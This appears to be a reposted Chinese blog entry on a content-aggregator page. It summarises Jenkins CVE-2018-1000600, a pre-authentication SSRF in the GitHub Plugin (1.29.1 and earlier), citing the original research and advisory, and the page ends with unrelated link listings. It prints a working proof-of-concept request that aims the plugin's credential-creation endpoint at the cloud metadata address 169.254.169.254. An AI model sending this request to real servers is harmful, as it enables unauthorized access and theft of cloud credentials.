当前位置: 首页 > news >正文

Jenkins CVE-2018-1000600漏洞利用与SSRF攻击分析

Jenkins - CVE-2018-1000600 PoC

来源博客文章
https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

漏洞链利用
通过与CVE-2018-1000600链式结合,实现预认证完全响应SSRF攻击。
官方安全公告:https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915

影响范围
该漏洞影响默认安装的GitHub插件,具体版本为GitHub Plugin 1.29.1及以下

PoC代码

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai

标签
devops, jenkins, Pentesting
发布时间
2019年3月5日下午2:01
作者
CG
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码

http://www.sczhlp.com/news/110413/

相关文章:

  • 唐山网站建设方案策划网站建设哪些好
  • 状元村建设官方网站江苏住房城乡建设网站
  • 便宜做网站公司网站建设方案保障措施
  • 做网站 简单外包seopeixun
  • 学校建设网站的作用怎么让别人在百度搜到自己的网站
  • 东阳实惠营销型网站建设厂家做网站要不要营业执照
  • 苏州 规划建设局网站人力资源加盟代理哪个好
  • 网站通栏广州海珠区邮编
  • 做简历有什么网站怎么做动漫网站
  • linux中mysql如何远程连接
  • 详细介绍:Python:OpenCV 教程——从传统视觉到深度学习:YOLOv8 与 OpenCV DNN 模块协同实现工业缺陷检测
  • 深入解析:PYcharm——pyqt音乐播放器
  • wordpress实现网站的登陆功能网站经常修改好不好
  • 手机网站模板使用方法建设银行网站登录密码
  • Day02
  • 企业建站系统插件介绍南通企业网站seo
  • 培训学校网站网易博客搬家wordpress
  • 安阳网站建设安阳物业公司企业文化建设
  • 网站做优化效果怎么样wordpress一键关注
  • wordpress字典女生适合做seo吗
  • 上海网站建设上海黄金网站制作需要哪些
  • 可以做产品设计网站app制作平台哪个好用
  • 做百度竞价对网站空间有什么要求自己开发网站需要多少钱
  • 网站做成app的软件医疗网站建设流程
  • 专题:Python实现贝叶斯线性回归与MCMC采样数据可视化分析2实例|附代码数据
  • 威联通NAS如何导入本地docker镜像
  • 什么好的主题做网站物联网工程专业就业方向及前景
  • iis网站ipnas ddnsto wordpress
  • 儿童摄影网站建设与网站签约
  • 哪个网站的课件做的好处呼伦贝尔市建设局网站